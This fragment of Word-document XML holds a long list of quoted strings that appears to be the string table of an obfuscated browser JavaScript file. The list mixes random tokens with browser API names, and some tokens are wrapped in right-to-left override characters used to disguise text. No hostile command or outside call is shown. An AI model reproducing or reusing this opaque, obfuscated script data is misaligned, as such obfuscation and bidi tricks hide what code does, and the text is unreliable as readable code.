        <w:t>-xo", "ZagTqByrx1Lylj8", "j9V_xjqBsEvXwhc", "reduce", "98hJjjKUkhiB_GAaQe4", "FvtZmCmEuEj4_SVKTPE", "kd19yQWE_ECOphEpbJv-TjS8", "A609-Q", "Math", "EcI", "No9grwyC-Hw", "QTqEWP5kLboKVKI", "CBebbM1vVqMWRp0", "Om6mD9N8Nqp3", "01S_F50", "LGXcZ7klEfdxcqfZhBZJ57R8RwZI8FnLEYehmklGnmeqqEETUERzfPhzzVanwJ-3R0uiWX8", "DGHjEqQEN8tMS8nn8zsgna8FO256m1qYMqeBvV9s2k_h9GVrKF9uLNMjtiSmlPfCJCGWQB2-YLrQBP7qGg", "s2DOKqJ2LNpSbLjb6Q", "7yaZQ-dKf64NOOOqjzcU9bw1Pxtp3TL1Jw", "b4kxuRzq4Q", "E7g54Veq", "X0m6B9lWcg", "8CbDWbwGDs0PML2m31oTg9l8ChMUmyv6Tg", "myiqL8NKeI8", "sqVK2VmRngo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LEPSOpMJIutz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "5eQD7FHy7S0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ryDNGaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "abs", "LlapLcJHVJ4", "b5tYwCKY02yp", "-2\u202EYuuMIdcQn\u202D", "kTTwJIsjFM1BQN3SvV8x3ZEzW2VC9g", "children", "NcYMjG_z7Db-zzBMKNI", "function", "zpE_n1Lj-gbapRI", "O2jeQqpFF_gxLaU", "U8MfsWXI8iWXiAM-Q-XLSzE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QFi-NdhjDg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XtdalXyujU_S_WIeIK-LdRz68Y7vTeZ53w", "8CSDbPptaacjeaL2", "haIY4VnkwjqI5AQzBtKFEkfi", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GVyTGg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6TzFK6c6bfctcqq5yEkPrMlzVxBZ-zn_Xcbk2klXu2TNxVlLBgVSUb5J1xP5jM3qQ0r0WC2dBtq1KsHEeqIgHw", "match", "C6Ur43rm3x3Zzlc", "2cB87miNhgI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "E61hywjqlA", "PGDNZ5kZB9x-cd7B3wM", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"interactive", "y-5C10uBjhfKlnQ", "qbo51XzQ7g", "min", "-5gc1WfC13uprj5JDbmI", "SapNkz-f726EjWA4HuHZ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setPrototypeOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "any", "bst0jze6qXak", "detail", "sJxGyV-Jrln7xRZrTIk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TGc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ltltkQ-Hv0XJvUtSfw", "ga003CvjqGvbtxhCRfymCGk", "f_cbvHb23A", "PXKyBN04FpxiMM_k2xVm_Lo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XQbKHoYdVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "34teyWz0zAncqDI-R4nPMQ", "-2HzdoQ3Rto", "18h2ggX1hQ","l3Q", "pEv2LuA", "hidden", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "lc4PomaMvQLRkWl1YabaTQ2V", "Cc9MkDePkCDp-Hsa", "JmGAKOt8HahlOPXc", "51v1cdk4IqtFDcmJvjQ4gLxSfHVt6U6QG9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Y0C4aJ1pDIVwTw", "9wL2cYgyBvghEJOP0W47qP9PKDA", "r-5wg2my_z6q8UkbGa30VDyjoY7DXqo", "CBf9e4QtYdpJVcq8_zEqkdpcM3hi4QjLVLqz90YC5kn48A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dTqqeMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4mOqd-RPOKtLftSjjn4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dispatchEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "RYx31QOB8Vmn2lZ8AeyeL0ut8LqObLl-xFMEB_X5PQ", "Go0q-wuE2g", "2F6XC-5FRK1xObi9mXVTvf0rJwoGhmavct-1wi1k-HzDzy4Pd1MaLsRU42HJ", "BNVs1Fs", "Mwy8QvpJbbRxHA", "NuJm2w-rznLE2FgOBw", "nNt9yxSC9lLJjlQxL7HlSh_HsuzhTvIy93stYrG_E40", "8SKXD_IcSbFu", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9UxxU_H2GfWxwcjdb3oWzyDz-7bRtQL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XlI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "undefined", "13n0cKc6Rg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "catch", "substring", "zMNB_D-0m2z1", "SQHWQ9YcNtkvUYD20A", "sSWXbu91QvQ", "6jOVSIYxaLI0QoT41Q", "3BmUVo0", "DSzWeIIucOoqQtf66ngjt_hcZHc7", "wgS4aOITMI8", "6CDMVI4J", "mFDRVo87P69HdPflwA", "6xH3fpwrDO8tSd7p1TRY3bw", "round", "qjHRb7EhCuouLbmemG4I", "1mbfdvRKW95hVcvTgw", "n7cFjhHJ", "bwezb85xX88uNIQ", "aCWAEOE8PKVEZ50", "N12RKORyAJZ8a7w", "Yz_6d58EBuYUMs6H1T5J", "BgPYJ6Y6ZesuEA", "u3bSQL0jY-5bKPit", "A_pC8TPO4Q", "AoYVxSLsgGv5oSEtLtKedXnj-MydDuI8gBIeWNnfWO9tS7HY9q7dkz-Ye8lFHVdg7N8juPJN3Cdg", "Lqxf9AejoG-JszY9Hw", "bubbles", "itNNjzOd5Ejuvi5NB4evcziH88L1D8xi", "xIlL9jjTtXPn-nJD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MrFDizWMug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "set", "3gndOKZWXQ", "nK8S41H1wRrOthsMC-Y", "IDO0B9ljfYUUBqis", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mIBGnSifzGSilXcjSoPZdCOpkoI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8rIb", "string", "IccYhRvZ23XqiiA", "VBXsU7EKRN07BdTZkCQ", "bot1_wW-", "g1CpCKFQHfMZUOE", "mXD4XowgNdVMQ5T-hwh635dX", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qwKQB_RHKZs6KLbRhA", "2mDqPIY3QclPFoT2kCwy04o", "0-hpvR6lt1k", "80-FQcY", "e36hKtR3e5dRC5-HpUggh91YHDgnsRifTuiD9V5exVv_vAk0QSAsE_Ro1FfoqOSHahGNYHE", "N6olrgr0lB-Ty0hjXvKwEV7XsLeLP5pdyn4", "dlj3dw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>documentMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6WKucs1gKJY", "now", "dU72BJJ9ag", "xJse7EH3yUqN6CM8D9aO", "dzzFU9oze6Nq", "enumerable", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Odcu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "m4s_okyj-zbMzGhXZu2hFyWDg-XnYJR0", "xbUA033UyVk", "map", "^(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--zn7c)?$|%","Float64Array", "2Ngz8lLmwiz5gmI", "554", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ktg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "empty", "8d9TliOP62HwtCBTD4iSfS-Q29r8EdJ3x1kGMPSBT5JoD4T85_HNywvQLPEK", "kAvaOK1sXPk6", "Z4EEzXCVzQ", "4jj-K5c7dcMFGd6e", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kphz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6xiUDfhKSw", "4x7mf58AatwrQ8_G1WMBig", "bphlzxG3_W2z_xoTBuSrPG_v", "oUfPBKsXB6JqYfaUxXBH5ul8", "pDWJHKp6IaE", "UkuVIPh_BYVVNIKZ8x9s1qhTBkE", "B7Yo7Rnd9A7qnUIzBZi-HVqb3OrD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HLw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"OVG0Lstxebp4R8rRqC1k9K4LfWRq_0mNNcjuqDQu4knh4Q4IFFxrMbRKowCj-tLS", "Proxy", "true", "Date", "6hioIA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GKRmxg_vmQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bind", "type", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "J0jGLJIlC_hQDMHtzx1d150rJA", "oC2SEb1_dbYgLamw41gGoP58SFsZmXfvP5rC2A", "xnSyZOR6KKBSUZ2lkFk2gw", "cNNy9x650BDKkAw", "1Z0krxE", "LE7bbrIdH-ph", "sdBjmya8uQ", "DGbCU7odffA3K_G41Xxe4fVYNB4_wBK-Mdf_-wdisF3ImnZGUytNGIo", "yT7BdJ1yftgQ", "YybrIosOaPsQIK_x7y0B7b87b39gyH6tZ8Gz_lhc5w", "zEf1N9cBMMBtbbTQ1nRQr41CNx01yyo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw", "_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoJiqQjwzAo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M", "3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", "b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", "mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB", "jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", "0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
